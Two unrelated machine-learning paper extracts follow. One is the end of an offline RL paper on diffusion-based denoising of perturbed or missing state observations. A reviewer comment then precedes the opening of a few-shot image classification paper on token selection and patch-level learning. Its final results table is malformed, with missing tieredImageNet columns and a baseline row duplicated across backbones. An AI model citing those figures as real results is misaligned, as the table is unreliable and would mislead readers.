| | | MAD | 8.6±3.5 | 43.4±29.8 | 19.7±14.7 | 78.4±8.8 | 8.8±4.4 | 70.8±19.1 | 7.2±2.3 | 66.1±24.2 | 81.9±11.5 | 90.3±3.5 |
| | | MinQ | 7.3±4.2 | 30.3±26.1 | 66.5±11.8 | 78.5±4.2 | 21.7±15.9 | 76.4±14.9 | 47.2±23.2 | 68.0±19.5 | 82.3±1.4 | 89.6±1.7 |

We consider three additional types of noise attacks that are commonly used on state observations, under which the DMBP-strengthened algorithms also outperform the corresponding baselines (cf. Table 2): i) Uniform random noise distributed inside the $\ell_\infty$ ball with norm $\kappa$: $\hat{s}_t = s_t + \kappa \cdot \mathcal{U}(-I, I)$. ii) Maximum action-difference (adversarial) attack: the perturbed state is selected inside the $\ell_\infty$ ball of radius $\kappa$ around $s_t$, such that $\hat{s}_t = \arg\max_{\hat{s} \in B(s_t, \kappa)} D\big(\pi_\phi(\cdot \mid \hat{s}) \,\|\, \pi_\phi(\cdot \mid s_t)\big)$. Among 20 samples of $\hat{s}$ in the ball, we choose the one with the largest $\|\pi_\phi(\cdot \mid \hat{s}) - \pi_\phi(\cdot \mid s_t)\|^2$. iii) Minimum Q-value (adversarial) attack: the perturbed state is selected inside the $\ell_\infty$ ball of radius $\kappa$ such that $\hat{s}_t = \arg\min_{\hat{s} \in B(s_t, \kappa)} Q\big(s_t, \pi_\phi(\cdot \mid \hat{s})\big)$. Again, we sample 20 times and choose the one with the minimum Q-value as the perturbed state $\hat{s}_t$. The latter two adversarial attacks have been considered in the literature (Pinto et al., 2017; Zhang et al., 2020; Yang et al., 2022).
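The sampling-based attack selection above can be sketched as follows. This is a toy illustration in our own names: `policy` and `q_value` are assumed callables returning the action (distribution mean) and the critic value, respectively.

```python
import numpy as np

def sampled_attack(s, kappa, policy, q_value=None, n_samples=20, mode="mad"):
    """Pick the worst of n_samples uniform perturbations in the l_inf ball.
    mode="mad": maximum action difference; mode="minq": minimum Q-value."""
    a_clean = policy(s)
    best_s, best_score = s, -np.inf
    for _ in range(n_samples):
        s_pert = s + kappa * np.random.uniform(-1.0, 1.0, size=s.shape)
        if mode == "mad":
            score = np.sum((policy(s_pert) - a_clean) ** 2)
        else:  # "minq": larger score means smaller Q
            score = -q_value(s, policy(s_pert))
        if score > best_score:
            best_s, best_score = s_pert, score
    return best_s
```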
For a fair comparison, when we use DMBP against adversarial attacks, we first sample 20 noised states and denoise them using DMBP, and then choose the denoised state with the maximum action difference or the minimum Q-value as the perturbed input.

Figure 3: The performance of CQL, DMBP-CQL, RORL, and DMBP-RORL with incomplete state observations that have 1-5 unobserved dimensions. The dash-dot lines represent the performance of the corresponding baseline algorithms in the original environment with fully observable states. (The total state observation dimension is 11 for hopper, and 17 for both halfcheetah and walker2d.)

5.2 Robustness Against Incomplete State Observations with Unobserved Dimensions

We utilize DMBP to recover the missing state information for decision-making. In the D4RL benchmark problems, we mask some dimensional state information so that it cannot be observed by the tested policy (i.e., the masked dimensions of the state are set to 0 for \( t \in \{2, 3, \ldots, T\} \)). The baseline algorithms make decisions based on the observed (incomplete) states, while the DMBP-improved counterparts take actions according to the recovered states. For each dimension of the state, we make that dimension unobserved and conduct 10 tests. When multiple state dimensions cannot be observed, we randomly select 30 groups of dimensions and conduct 10 tests on each group. The experimental results of CQL and RORL with the offline "expert" and "medium-replay" datasets are shown in Figure 3. DMBP significantly enhances the performance of all baseline algorithms by accurately predicting the missing state information. On "medium-replay" datasets, the DMBP-strengthened algorithms incur little performance degradation in the masked environments, compared with what they achieve in the original environments with complete and accurate observations.

5.3 Ablation Study

Figure 4: The checkpoint and training-process evaluations of DMBP-Diffusion QL under Gaussian random noises, where DMBP is trained on hopper-expert-v2 with different sample trajectory lengths (\( M \)). The curves are averaged over 5 random seeds, and the checkpoints are selected randomly after gradient steps of \( 2 \times 10^6 \).

In Figure 4, we conduct ablation studies on the dataset "hopper-expert-v2", where algorithms are more prone to error accumulation than in other datasets/environments, to demonstrate the efficacy of the proposed non-Markovian loss function and to evaluate the impact of the non-Markovian sampling length (\( M \) in Eq. 7). We utilize pre-trained Diffusion QL for decision-making to evaluate the performance of DMBP under the framework in Figure 1. Other hyperparameters and the DMBP training follow the basic settings in Appendix B.2 and D.1, respectively. When \( M = 1 \), the DMBP training objective reduces to the classical training objective of diffusion models in Eq. 1 (i.e., the \( L_m \) terms vanish in Eq. 7).
From the second to the fourth subplots of Figure 4, we observe that the direct adoption of classical conditional diffusion models suffers from severe error accumulation as training proceeds. The proposed non-Markovian training objective significantly enhances the robustness of the baseline RL algorithm against state-observation perturbations, especially when the noise scale is large. When \( M \) is no less than 6, the performance of DMBP remains almost the same. To expedite the computation, we set \( M = 6 \) for the "hopper" environment. More ablation studies on the neural network structure and the condition trajectory length (\( N \)) can be found in Appendix C.

6 Conclusion

In this work, we propose the first state-denoising framework for offline RL against observation perturbations in state-based tasks. Leveraging conditional diffusion models, we develop the Diffusion Model-Based Predictor (DMBP) to recover the actual state for decision-making. To reduce error accumulation during testing, we propose a new non-Markovian loss function that minimizes the sum entropy of denoised states along the trajectory. Experiments on D4RL benchmarks demonstrate that the proposed DMBP can significantly enhance the robustness of existing offline RL algorithms against different scales of random noises and even adversarial attacks. The proposed framework is also shown to effectively handle incomplete state observations (with multiple unobserved dimensions) in state-based RL tasks.

ACKNOWLEDGMENTS

This work was supported in part by the General Research Fund (GRF) project 14200720 of the Hong Kong University Grants Committee and the National Natural Science Foundation of China (NSFC) Project 62073273. The authors would like to thank the anonymous reviewers for valuable discussion.

REFERENCES

Anurag Ajay, Yilun Du, Abhi Gupta, Joshua Tenenbaum, Tommi Jaakkola, and Pulkit Agrawal. Is conditional generative modeling all you need for decision-making? arXiv preprint arXiv:2211.15657, 2022.

Gaon An, Seungyong Moon, Jang-Hyun Kim, and Hyun Oh Song. Uncertainty-based offline reinforcement learning with diversified Q-ensemble. Advances in Neural Information Processing Systems, 34:7436–7447, 2021.

David M Chan, Roshan Rao, Forrest Huang, and John F Canny. t-sne-cuda: Gpu-accelerated t-sne and its applications to modern data. In 2018 30th International Symposium on Computer Architecture and High Performance Computing (SBAC-PAD), pp. 330–338. IEEE, 2018.

Hyungjin Chung, Byeongsu Sim, and Jong Chul Ye. Come-closer-diffuse-faster: Accelerating conditional diffusion models for inverse problems through stochastic contraction. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 12413–12422, 2022.

Giulio Franzese, Simone Rossi, Lixuan Yang, Alessandro Finamore, Dario Rossi, Maurizio Filippone, and Pietro Michiardi. How much is enough? a study on diffusion times in score-based generative models. arXiv preprint arXiv:2206.05173, 2022.

Justin Fu, Aviral Kumar, Ofir Nachum, George Tucker, and Sergey Levine. D4RL: Datasets for deep data-driven reinforcement learning. arXiv preprint arXiv:2004.07219, 2020.

Scott Fujimoto and Shixiang Shane Gu. A minimalist approach to offline reinforcement learning. Advances in Neural Information Processing Systems, 34:20132–20145, 2021.

Scott Fujimoto, David Meger, and Doina Precup. Off-policy deep reinforcement learning without exploration. In International Conference on Machine Learning, pp. 2052–2062. PMLR, 2019.
Adam Gleave, Michael Dennis, Cody Wild, Neel Kant, Sergey Levine, and Stuart Russell. Adversarial policies: Attacking deep reinforcement learning. arXiv preprint arXiv:1905.10615, 2019. Chin Pang Ho, Marek Petrik, and Wolfram Wiesemann. Fast Bellman updates for robust MDPs. In International Conference on Machine Learning, pp. 1979–1988. PMLR, 2018. Jonathan Ho, Ajay Jain, and Pieter Abbeel. Denoising diffusion probabilistic models. Advances in Neural Information Processing Systems, 33:6840–6851, 2020. Michael Janner, Justin Fu, Marvin Zhang, and Sergey Levine. When to trust your model: Model-based policy optimization. Advances in Neural Information Processing Systems, 32, 2019. Michael Janner, Yilun Du, Joshua B. Tenenbaum, and Sergey Levine. Planning with diffusion for flexible behavior synthesis. In International Conference on Machine Learning, 2022. Aviral Kumar, Justin Fu, Matthew Soh, George Tucker, and Sergey Levine. Stabilizing off-policy Q-learning via bootstrapping error reduction. Advances in Neural Information Processing Systems, 32, 2019. Aviral Kumar, Aurick Zhou, George Tucker, and Sergey Levine. Conservative Q-learning for offline reinforcement learning. Advances in Neural Information Processing Systems, 33:1179–1191, 2020. Sergey Levine, Aviral Kumar, George Tucker, and Justin Fu. Offline reinforcement learning: Tutorial, review, and perspectives on open problems. arXiv preprint arXiv:2005.01643, 2020.
EYtga9mSdT
- Self-supervised pretraining has proven to be extremely helpful for few-shot learning [2, 3]. As most of the other methods compared in this paper do not use self-supervised pretraining, the comparisons are not fair.
BALANCED LEARNING WITH TOKEN SELECTION FOR FEW-SHOT CLASSIFICATION

Anonymous authors
Paper under double-blind review

ABSTRACT

In recent years, patch-based approaches have shown promise in few-shot learning, with further improvements observed through the use of self-supervised learning. However, we observe that the mainstream object-oriented approach focuses mainly on the salient parts of the subject and ignores the non-annotated parts of the image. Based on the assumption that every patch of the image is beneficial to learning, we present an end-to-end learning framework that reconsiders the whole image from a multi-level perspective. The learning of annotated subjects involves Direct Patch Learning (DPL) to promote balanced learning of different features, and Gaussian Mixup (GMIX) to provide extra mixed patch-level labels. As for the non-annotated part, we utilize a cascading token selection strategy along with self-supervised learning to better exploit knowledge in the background, by learning consistent representations of different views from the same image. Finally, in inductive few-shot learning, our method outperforms many previous methods and achieves new state-of-the-art performance. Furthermore, it provides the insight that non-annotated parts are also favorable for few-shot learning. As an ablation study, the effectiveness of each designed component is verified, and the mechanism by which our method outperforms the baseline is shown both quantitatively and visually.

1 INTRODUCTION

Few-shot Learning (FSL) is a highly challenging task, which aims to adapt to new tasks using a very small amount of labeled data. In recent years, many methods (Finn et al., 2017; Vinyals et al., 2016a; Tran et al., 2020a; Chen et al., 2019; Jamal & Qi, 2019; Hao et al., 2019; Li et al., 2019; Qiao et al., 2019; Sun et al., 2019; Rodríguez et al., 2020; Jelley et al., 2022) have been proposed to tackle this problem. Most few-shot methods contain two stages, meta-training and meta-testing. After pre-training a backbone on the base set in meta-training, the method's performance on novel classes is evaluated on many few-shot tasks during meta-testing. Few-shot learning can be categorized into transductive and inductive methods; their difference is that transductive methods add the novel set as unlabeled data to the base set. This paper focuses on the more general inductive setting. Some recent studies (Hiller et al., 2022; Zhang et al., 2020; He et al., 2022; Lifchitz et al., 2019; Huang et al., 2021) have shown that patch-based methods benefit few-shot learning. DeepEMD (Zhang et al., 2020) regarded each patch as a component of an object; the similarity used for classification is calculated by optimal matching between patches. However, the Hungarian algorithm for solving the optimal matching is computationally expensive. Densecls (Lifchitz et al., 2019) trained each local patch using an image-level label to promote consistent predictions across different patches. Overall, previous object-oriented few-shot work has argued that a complete classification task can be achieved using only the region where the object resides. However, certain patches, the so-called background patches, might contain overlapping objects and richer semantic information, which the model does not fully leverage during training, further limiting its performance. Based on these thoughts, Tokmakov et al. (2019) introduced background attributes in a limited way to enable background learning.
However, this research trend has not yet resulted in a viable end-to-end learning model. Figure 1: Guided-backpropagation (Springenberg et al., 2015) visualization of our strategy. The second column confirms the phenomena described in the motivation of Sec 3.1: parts within annotated objects (body and tails) and non-annotated parts beyond objects (grassland) are indeed ignored. These phenomena are mitigated by our proposed strategy. To tackle these concerns, we propose a multi-stage end-to-end framework, named Cascading Patch-Wise Network. The overall framework comprises \( n \) successive token selections along with a self-supervised learning loss. The token selection strategy separates tokens into "top tokens" and "bottom tokens" based on their ranking scores. In foreground learning (basically the top tokens after the first selection), we propose two methods, Direct Patch Learning (DPL) and Gaussian Mixup (GMIX). DPL operates on particular local foreground patch tokens, while GMIX offers patch-level labels to DPL by mixing different patches. In contrast, we apply self-supervised learning to each level of bottom tokens to further learn the image's structural information and increase data-utilization efficiency, thereby enhancing the model's robust representation capabilities. In summary, our main contributions are: • An end-to-end Cascading Patch-Wise Network for fully utilizing the contextual information for few-shot learning is proposed. Based on such a network, our method makes significant improvements over its baseline and proves the potential value of non-annotated parts. • The token selection strategy is implemented to divide the learning process into "top tokens" and "bottom tokens". Employing self-supervised learning to acquire knowledge from the "bottom tokens" brings effective utilization of the available data. • Direct Patch Learning along with Gaussian Mixup is utilized to balance the learning of diverse features and improve the representational capacity of local tokens. By demonstrating the visualization results of local tokens' activation areas, we validate the efficacy of Direct Patch Learning. 2 RELATED WORK Meta-learning. Meta-learning is the dominant paradigm in few-shot learning, which makes the model generalize to new tasks better by constructing multiple learning tasks. Researchers have proposed many meta-learning methods (Finn et al., 2017; Koch et al., 2015; Snell et al., 2017a; Vinyals et al., 2016a; Oreshkin et al., 2018b). Some other methods (Chen et al., 2019; Lee et al., 2019b; Tian et al., 2020b; Mangla et al., 2020) focus on pre-training a better backbone, solving the few-shot classification problem with a linear classifier or metric learning. In this paper, we pay more attention to training an efficient backbone and improving the generalization ability of the model to novel categories. Patch-based Method. LMPNet (Huang et al., 2021) considers a local token as a local descriptor, calculates the distance between each pair of tokens in two images, and takes the average distance over all pairs as the matching score for the images. DeepEMD (Zhang et al., 2020) follows a similar idea to LMPNet (Huang et al., 2021), but computes the matching score for image tokens using optimal matching. It needs to solve an optimal matching problem during training, which is computationally expensive. Densecls (Lifchitz et al., 2019) trained each local patch with an image-level label to encourage the same prediction over different patches.
Our work here takes a different approach, aiming to strengthen the representational ability of tokens and better exploit knowledge from the given limited data. Self-supervised learning in FSL. In the papers of Gidaris et al. (2019), He et al. (2022), Hiller et al. (2022), and Su et al. (2020), self-supervised methods were introduced for few-shot learning, and they indicate that supervised learning provides inferior performance compared with self-supervised methods in few-shot scenarios. We adopt the self-supervised methods DINO (Caron et al., 2021), iBOT (Zhou et al., 2022), and DINOv2 (Oquab et al., 2023) to squeeze out residual information beyond the annotated object. Finally, the three methods are compared visually and quantitatively. Cascading learning. HCT (He et al., 2022) used spectral clustering to perform pooling on patches so that the model learns at different semantic levels. Similar to ours, HCT uses the framework of self-supervised learning methods to achieve SOTA performance, but our motivation and method are still different from HCT's (detailed in Appendix A). 3 METHOD 3.1 DEFINITION AND MOTIVATION Definition: Few-shot classification involves dividing the dataset into two distinct sets, denoted as \(D_{base}\) and \(D_{novel}\). The former, \(D_{base}\), is utilized to conduct meta-training, the process of training a model to learn how to learn. At test time, few-shot testing tasks are constructed on \(D_{novel}\); each contains a tuple \((D_{support}, D_{query})\). If \(D_{support}\) contains \(K\) classes and each class has \(N\) samples, it is called a \(K\)-way-\(N\)-shot task. Motivation: 1) "Shortcut" effect of the annotated objects. For a targeted object, networks prefer to discriminate it by only part of the patches. In layman's terms, not only can an elephant's trunk be used as a foreground feature to recognize an elephant, but so can its legs and ears. So if a balanced learning scenario is not constructed for the foreground patches, robustness is reduced. 2) "Unused residual information" beyond the annotated objects. These parts of the image carry no class labels, yet they still hold prior information that brings additional (if limited) learning value. Optimisation goals: Overall, we construct different cascading weight-redistribution strategies for the patches ranked by token selection. For the object itself, we alleviate the shortcut effect that occurs when a certain patch is too easy to recognize. For low-ranked patches that contain even less information, a cascading iterative method is used to squeeze out the residual information. Our overall pipeline is illustrated in Fig 2. The multiple token selection module (Sec 3.2) is used to distinguish "top tokens" from "bottom tokens". Generally, only the top and bottom tokens after the first selection can be interpreted as foreground and background. To alleviate the "shortcut" effect of the annotated object, Direct Patch Learning (Sec 3.3) is proposed for the foreground, which is only used after the first selection. Finally, the cascading self-supervised learning strategy (Sec 3.4) squeezes limited information patch-wisely out of the rest of the bottom tokens. Figure 3: Patches of the first token selection. Patches with brighter masks are selected as top patches for Direct Patch Learning, while patches with darker masks are considered bottom patches that serve as input for the second selection, which is utilized for mining background information. 3.2 Token Selection
Since the motivation in Sec. 3.1 mentions the need to build a supervised representation for the unlabelled part of the image, it is natural to think of the currently popular self-supervised learning methods, which are also discussed in Sec. 3.4 and Appendix A. Further research on DINO (Caron et al., 2021), iBOT (Zhou et al., 2022), and DINOv2 (Oquab et al., 2023) points out that the self-attention map of the [cls] token highlights the areas where the foreground object is located and suppresses the background area. Inspired by this, we present a feature selection mechanism based on random walks that distinguishes "top tokens" from "bottom tokens" in the current context. Furthermore, we do not merely discard the bottom tokens but employ self-supervised learning to mine the structural information inherent in the image, which we find beneficial for few-shot learning. In the token selection strategy, tokens with high relevance to the [cls] token are selected as top tokens for patch-level supervised training, while those with lower relevance are used as input for the next encoder to learn background representations. Fig. 3 illustrates a visualized example of the token selection process. To select the tokens most closely associated with the [cls] token (i.e., the top tokens), it is necessary to determine the degree of relevance between the [cls] token and the patch tokens. Inspired by the PageRank (Page et al., 1998) algorithm, we consider different tokens as states and attention scores as the probability transition matrix between states, and thus construct a Markov chain. Starting from the state corresponding to [cls], after s steps we obtain the distribution of states $\pi_s$, formalized as follows: $$\pi_s = \pi_{s-1}A = \pi_0A^s,$$ (1) where $\pi_0 = (0, 0, \ldots, 0, 1)$, meaning the chain starts from the state corresponding to the [cls] token, and $A$ is the probability transition matrix obtained from the attention scores averaged over all heads of the multi-head transformer. In our final setting, we set $s = 3$. Finally, we rank the probability distribution over states and remove the top half of tokens with the highest probabilities; the remaining tokens proceed to the next encoder for further learning. An intuitive explanation for this approach is that higher probabilities indicate a stronger association between the corresponding patch tokens and the [cls] token. Since the [cls] token encodes the features of a specific object in the current context, we exclude these tokens, allowing the next encoder to focus on learning from the remaining ones. To extract the limited information from the remaining bottom tokens, self-supervised learning methods and the cascading learning strategy are applied. The process of self-supervised learning is introduced and analyzed in Sec. 3.4 and Sec. 4.4.
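A minimal PyTorch sketch of this random-walk selection follows. It is our own illustration of Eq. 1 rather than the paper's code: the [cls] token is placed at the last index to match $\pi_0$, and the 0.5 split ratio reflects the "top half" rule above.

```python
import torch

def select_tokens(attn, s=3, top_ratio=0.5):
    """Random-walk token selection (Eq. 1). `attn` is the head-averaged
    attention matrix of shape (n, n) whose rows sum to one, so it serves
    as the transition matrix A; the [cls] token sits at the last index."""
    n = attn.size(0)
    pi = torch.zeros(n)
    pi[-1] = 1.0                          # pi_0: start from the [cls] state
    for _ in range(s):
        pi = pi @ attn                    # pi_s = pi_0 A^s
    scores = pi[:-1]                      # relevance of each patch token
    k = int(scores.numel() * top_ratio)
    top = scores.topk(k).indices          # top tokens -> Direct Patch Learning
    keep = torch.ones(n - 1, dtype=torch.bool)
    keep[top] = False
    bottom = keep.nonzero(as_tuple=True)[0]  # bottom tokens -> next encoder
    return top, bottom
```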
### 3.3 Direct Patch Learning

The "shortcut effect" is again illustrated by the example of an elephant and its trunk. Empirically speaking, an elephant can be identified easily by its distinctive trunk alone. An object $x$ can be described as a set of features $[t_1, t_2, \ldots, t_n]$, where each $t_i$ can be parameterized as a function of $x$, $[t_1, \ldots, t_n] = f_\theta(x)$. Typically, in classical deep-learning classification, the features are not explicitly separated, and the conditional distribution $p(y \mid x)$ is the model's direct output. In few-shot learning, learning only the salient features of the base classes during meta-training may not be sufficient, as saliency implies a strong correlation with a specific base class and will not provide effective discriminative features when dealing with novel classes. Let \( t_1 \) represent the feature of the trunk, and \( t_2 \) represent the feature of the skin texture. Due to the strong correlation between \( t_1 \) and the elephant class, we can observe \[ 1 \approx p(y = \text{elephant} \mid t_1, t_2) \approx p(y \mid t_1) = p(y \mid t_1) + 0 \cdot p(y \mid t_2). \] (2) If \( t_2 \) is an output of the neural network, the learning of \( t_2 \) can be weak or non-existent, resulting in overfitting on the base classes. Essentially, this scenario can be seen as weighted learning of features, which selects features according to the class feature bias, suppresses weakly correlated outputs, and benefits the classification of base classes. However, as training progresses, performance on base classes tends to improve at the expense of the ability to discriminate among novel classes (Chen et al., 2021). Although data augmentation techniques such as RandCrop can reduce this risk to some extent, we aim to further reduce it at the model level. To address this issue, we transform the original learning objective, \( p(y|x) = p(y|t_1, t_2, \ldots, t_n) \), into multiple balanced weak classifiers \( p(y|t_i) \). For each weak classifier, only a single feature is utilized, so the modeling objective becomes: \[ p(y \mid x) = \frac{1}{n} \sum_{i \leq n} p(y \mid t_i). \] (3) We pursue this approach for two main purposes. Firstly, it helps reduce overfitting to the base classes by imposing additional constraints. Secondly, it promotes balanced learning of different features and minimizes the occurrence of "shortcuts". The desired situation is that the \( t_i \) in the feature set carry diverse semantic information and can be separated for optimization using Eq. 3. However, for common classification tasks, the features \( t_i \) are highly entangled, and considering them separately is intractable. We use the local patches' representations as \( t_i \), since patches in one image naturally represent local attributes. Specifically, \( t_i \) can be a feature vector from a convolutional network or a token from a transformer that describes the corresponding local area. LMPNet (Huang et al., 2021) also considers a local token as a local descriptor; however, its purpose is more similar to that of DeepEMD (Zhang et al., 2020), which uses local tokens to compute matching scores between two images. Our aim is instead to construct a feature-diverse classification model that weakens the suppression of weakly correlated features and enhances the generalization ability to novel classes. Based on Jensen's inequality and Eq. 3, we define the Direct Patch Learning loss function as: \[ L_{DPL} := -\frac{1}{n} \sum_i \mathbb{E}(\log(p(y \mid t_i))) \geq -\mathbb{E}\Big(\log\Big(\frac{1}{n} \sum_i p(y \mid t_i)\Big)\Big). \] (4) That is, we optimize an upper bound of the cross-entropy of the unweighted feature model, making the computation tractable.

### 3.4 Patch-wise Learning Strategy

**Patch-level Label.** In the few-shot classification task, only image-level annotations are available. Besides, a local patch might contain multiple overlapping objects, such as a sheep grazing on a grassland. If this patch's label were simply assigned as "sheep", the learning of grassland features would be ignored. To alleviate this problem, we propose Gaussian MixUp (GMIX). Instead of using a scalar to mix two images, we use a mixing matrix generated from a Gaussian distribution, as shown in Fig. 4. There thus exist patches with complex mixed semantics, and hard labels are replaced by soft labels.
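The following is a minimal sketch of how such a Gaussian mixing matrix and the resulting soft patch labels could be produced. It is our own illustration, not the paper's implementation: we use a single random Gaussian (Fig. 4 mentions two), and the patch size and sigma range are placeholders; image sides are assumed divisible by the patch size.

```python
import torch

def gmix(x1, x2, y1, y2, p=16, sigma_range=(0.1, 0.5)):
    """Blend two images with a spatial weight map from a random 2-D Gaussian
    and emit per-patch soft labels. x: (C, H, W) images; y: one-hot labels."""
    _, H, W = x1.shape
    cy, cx = torch.rand(2) * torch.tensor([H, W], dtype=torch.float)
    sigma = torch.empty(1).uniform_(*sigma_range) * max(H, W)
    ys, xs = torch.meshgrid(torch.arange(H, dtype=torch.float),
                            torch.arange(W, dtype=torch.float), indexing="ij")
    w = torch.exp(-((ys - cy) ** 2 + (xs - cx) ** 2) / (2 * sigma ** 2))
    mixed = w * x1 + (1 - w) * x2               # pixel-wise blend
    # per-patch soft labels from the average weight inside each patch
    w_patch = w.reshape(H // p, p, W // p, p).mean(dim=(1, 3)).flatten()
    soft = w_patch[:, None] * y1[None, :] + (1 - w_patch)[:, None] * y2[None, :]
    return mixed, soft
```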
**n-th cascading patch-wise learning strategy.** In the first stage, after token selection on the outputs of the first encoder, we obtain foreground-relevant and background-relevant patch sets \( P_f \) and \( P_b \). The patch-level supervision loss involves only the foreground tokens from the student network, denoted as \( P_f^{(s)} = (t_1, \ldots, t_n) \): \[ L_{DPL} = -\frac{1}{n} \sum_i \mathbb{E}(\log(p(y \mid t_i))). \] (5) Figure 4: Gaussian MixUp for Patch-level Labels. The loss function is denoted by $L$, where $z$ represents the class label and $y$ denotes the network output. The GMIX algorithm generates pixel weights through two randomly generated Gaussian functions, which are utilized to blend two images and produce soft labels for Direct Patch Learning. For the [cls] tokens, we use the self-supervised loss ($L_{ssl}$) from DINO (Caron et al., 2021), iBOT (Zhou et al., 2022), or DINOv2 (Oquab et al., 2023) for self-supervised training. The loss used in the first stage is defined as $$L^{1st} = L_{ssl}^{1st} + L_{DPL}. \quad (6)$$ Instead of being discarded, the semantically less relevant bottom tokens \( P_b \) are used as input for the second encoder for further mining of the rich contextual information inherent in the image. The [cls] token from the \( n \)-th stage is only used for the self-supervised loss computation (detailed in Appendix A), as in the previous stage. The total loss is then $$L^{nth} = L_{ssl}^{1st} + L_{DPL} + \alpha L_{ssl}^{nth}, \quad (7)$$ where $\alpha$ is the degradation hyper-parameter. We present the overall pipeline in Algorithm 1, where GMIX is omitted for the sake of simplicity. During testing, only the output of the first encoder is utilized, and the average of the foreground tokens and the [cls] token are concatenated as the final feature vector. A cosine classifier is constructed to perform the few-shot classification task.

**Algorithm 1 Training pipeline** $\theta_s$ and $\theta_t$ are the parameters of the student and teacher networks, respectively.

```
1: for each epoch $\in [0, total\_epochs)$ do
2:   for each iteration do
3:     $L \leftarrow L_{DPL}$
4:     if epoch > stage1\_epoch then
5:       for each $n^{th} \in total\_layers$ do
6:         $L \leftarrow L + \alpha L_{ssl}^{nth}$
7:       end for
8:     end if
9:     $\theta_s \leftarrow \theta_s - lr * \frac{\partial L}{\partial \theta_s}$
10:    $z \leftarrow z - lr * \frac{\partial L}{\partial z}$
11:    $\theta_t \leftarrow \theta_t * momentum + \theta_s * (1 - momentum)$
12:  end for
13: end for
```

### 4 EXPERIMENT

#### 4.1 DATASET

MiniImageNet (Vinyals et al., 2016b) is a subset of the ImageNet (Deng et al., 2009) dataset. It comprises 100 classes, of which 64, 16, and 20 are used for training, validation, and testing, respectively. Each class in MiniImageNet consists of 600 images, resulting in a total of 60,000 images. TieredImageNet (Ren et al., 2018) is also a subset of ImageNet and represents an extension of MiniImageNet, encompassing 608 classes, of which 351, 97, and 160 classes are allocated to the training, validation, and testing splits, respectively. TieredImageNet contains 779,165 images in total.
CIFAR-FS (Bertinetto et al., 2018) divides the 100 classes of the CIFAR-100 dataset into training, validation, and testing sets consisting of 64, 16, and 20 classes, respectively. Each category in CIFAR-FS contains 600 images. FC100 (Oreshkin et al., 2018a) is also derived from the CIFAR-100 dataset, but the distribution of categories across the training, validation, and testing sets is more diverse, rendering the task more challenging.

### 4.2 IMPLEMENTATION DETAILS

The AdamW optimizer is employed with linear learning-rate warm-up and a cosine learning-rate scheduler. Our experiments are conducted on 8 Nvidia V100 GPUs over 400 epochs. A multi-crop strategy from DINO is also implemented, which includes 2 global images and 8 local images. Our method is evaluated on three different architectures, namely ResNet18, EfficientNet-B0, and ViT-S (detailed in Appendix A). For ResNet18, we set the global image resolution to $224 \times 224$ and the local patch resolution to $96 \times 96$. For EfficientNet-B0, we set the global image resolution to $384 \times 384$ and the local resolution to $144 \times 144$. In cascading learning, the training is conducted in two stages. In the first stage, the backbone and the first encoder are trained for 300 epochs. In the second stage, all network components are trained until 400 epochs. The loss weight $\alpha$ in Algorithm 1 is set to 0.1. For the remaining settings, we follow the original self-supervised model implementations. In our evaluation, the standard protocol described in (Mangla et al., 2020; He et al., 2022; Tian et al., 2020b) is employed. We construct a cosine classifier to solve few-shot tasks and evaluate our experiments on 5-way 1-shot and 5-way 5-shot classification. For each task, 1 or 5 labeled images are used as support data, and the remaining unlabeled images of the same categories are used as query data. In this paper, we sample 2,000 testing tasks for performance evaluation.

**Figure 5:** Visualization results of features extracted from the network on miniImageNet. Our scheme has better classification boundaries on the validation set.

### 4.3 COMPARISON

#### Results on miniImageNet and tieredImageNet. Table 1 displays the results obtained on miniImageNet and tieredImageNet. Our proposed method outperforms previous state-of-the-art methods that also use a simple CNN (such as ResNet12) on all benchmarks. Notably, a significant improvement over the second-best method is achieved: in the 5-way-1-shot setting, our method outperforms AMTNet (Lai et al., 2022) by 2.07% on miniImageNet, and in the 5-way-5-shot setting, it surpasses MCL (Liu et al., 2022) by 2.91%. Some recent methods use heavyweight backbones like ViT and Swin, which perform well but require a large amount of data to avoid overfitting, whereas our method with EfficientNet-B0 achieves state-of-the-art performance with better efficiency (Appendix A, Table 6). With our method, a modern backbone like EfficientNet attains higher performance, while large backbones like ViT only achieve relatively good results (also detailed and analyzed in Appendix A). Our approach allows the model to better utilize the information in the dataset and improves performance on novel classes.
#### Results on CIFAR-FS and FC100. Table 2 shows the results on the CIFAR-FS and FC100 datasets, where we achieve either the best or the second-best performance in all settings. Moreover, cross-domain experiments are also carried out and reach SOTA (detailed in Appendix A). Overall, SOTA results are achieved in most inductive few-shot learning scenarios. Although in a few other cases we only achieve relatively good results, this still demonstrates the effectiveness and efficiency of our method, which attains higher throughput and competitive performance using a lighter-weight network.

Table 1: Comparison on miniImageNet and tieredImageNet. Bold numbers indicate the best performance; blue numbers indicate the second-best performance. For a fairer comparison, we put methods using a traditional CNN (ResNet12) on top and methods using newer architectures at the bottom.

| Method | Backbone | miniImageNet 5-way | tieredImageNet 5-way |
|-------------------------|----------|--------------------|----------------------|
| | | 1-shot (%) | 5-shot (%) |
| Variational FSL | ResNet-12| 61.23±0.26 | 77.69±0.17 |
| MetaOptNet | ResNet-12| 62.64±0.61 | 78.63±0.64 |
| Fine-tuning | WRN-28-10| 57.73±0.62 | 78.17±0.49 |
| Neg-Cosine | ResNet-12| 63.85±0.81 | 81.57±0.56 |
| Rethinking-distill | ResNet-12| 64.82±0.60 | 82.14±0.43 |
| Meta-Baseline | ResNet-12| 63.17±0.23 | 79.26±0.17 |
| FEAT | ResNet-12| 66.78±0.20 | 82.05±0.14 |
| DeepEMD | ResNet-12| 65.91±0.82 | 82.41±0.56 |
| LookingWider | ResNet-12| 67.96±0.98 | 83.36±0.51 |
| ECS | ResNet-12| 66.82±0.80 | 84.35±0.51 |
| PAL | ResNet-12| 69.37±0.64 | 84.40±0.44 |
| FRN | ResNet-12| 66.45±0.19 | 82.83±0.13 |
| LDA | ResNet-12| 67.76±0.46 | 82.71±0.31 |
| SeFeat | ResNet-12| 68.32±0.62 | 82.71±0.46 |
| MCL | ResNet-12| 69.31±n/a | 85.11±n/a |
| LIF | ResNet-12| 68.94±0.28 | 85.07±0.50 |
| AMTNet | WRN-28 | 70.05±0.46 | 84.55±0.29 |
| Baseline | ResNet-12| 62.74±0.44 | 79.61±0.36 |
| Ours | ResNet-12| 72.12±0.40 | 88.02±0.28 |
| FewTURE | Swin-Tiny| 72.40±0.78 | 86.38±0.49 |
| HCTransformers | ViT-S×2 | 74.62±0.20 | 89.19±0.13 |
| Baseline | EfficientNet-B0| 62.74±0.44 | 79.61±0.36 |
